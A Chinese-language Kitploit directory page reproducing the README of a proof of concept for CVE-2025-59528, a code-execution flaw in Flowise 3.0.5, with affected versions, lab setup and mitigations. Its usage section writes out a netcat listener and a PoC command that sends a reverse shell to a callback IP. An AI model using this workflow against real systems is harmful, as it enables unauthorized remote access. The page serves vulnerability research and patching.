Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-59528-PoC — The poc of CVE-2025-59528 | Kitploit
工具/GitHubGitHub/sonnelon/cve-2025-59528-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubsonnelon/cve-2025-59528-poc

CVE-2025-59528-PoC

The poc of CVE-2025-59528

查看仓库
10天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-59528 PoC

在隔离的实验室环境中研究 CVE-2025-59528 的概念验证。

[!WARNING] 免责声明

本项目严格用于教育目的、安全研究以及对您拥有或已获明确授权测试的系统进行测试。

未经所有者许可,请勿对第三方服务器、公共服务或基础设施使用此 PoC。

作者不对因滥用本项目而造成的任何损害、数据丢失、服务中断或法律后果负责。

描述

此 PoC 演示了 CVE-2025-59528 的潜在影响,该漏洞涉及 Flowise 中处理用户可控的 mcpServerConfig。

在某些条件下,该漏洞可能允许攻击者在服务端上下文中执行任意 JavaScript 代码。

受影响版本

  • Flowise 3.0.5

修复版本

  • Flowise 3.0.6+

测试前请务必确认目标安装的确切版本。

环境要求

  • Python 3
  • requests
  • 本地或隔离的 Flowise 测试实例
  • 具有所需权限的授权账户

安装 Python 依赖:

root@kitploit:~
pip install requests

使用方法

运行 netcat 以获取 shell:

root@kitploit:~
nc -lvnp <YOUR_PORT>

使用以下命令运行 PoC:

root@kitploit:~
python3 poc.py \
    -t http://TARGET:PORT \
    -o api_key \
    -i CALLBACK_IP \
    -p CALLBACK_PORT

参数

实验室环境搭建

测试应在隔离的虚拟或实验室网络中进行。

root@kitploit:~
┌──────────────────┐
│    PoC Machine   │
│                  │
│    Python PoC    │
└────────┬─────────┘
         │
         │ Isolated Network
         │
┌────────▼─────────┐
│   Flowise 3.0.5  │
│   Test Instance  │
└──────────────────┘

请勿将故意存在漏洞的 Flowise 实例直接暴露到公共互联网。

缓解措施

如果您正在运行受影响版本的 Flowise:

  1. 将 Flowise 升级到已修复的版本。
  2. 限制对管理 API 的访问。
  3. 避免向不受信任的用户授予访问易受攻击功能所需的权限。
  4. 检查服务器日志中是否存在可疑请求。
  5. 升级后重新测试安装。

参考

  • CVE: CVE-2025-59528
  • 受影响软件: Flowise
  • 修复版本: 3.0.6+

法律声明

使用本项目即表示您确认自行负责遵守所有适用的法律法规。

请仅对您拥有或已获明确授权进行安全测试的系统使用此 PoC。

下载工具
参数描述
-t, --targetFlowise 测试实例的 URL
-o, --api_keyAPI 密钥
-i, --ip测试机器的 IP 地址
-p, --port测试环境使用的端口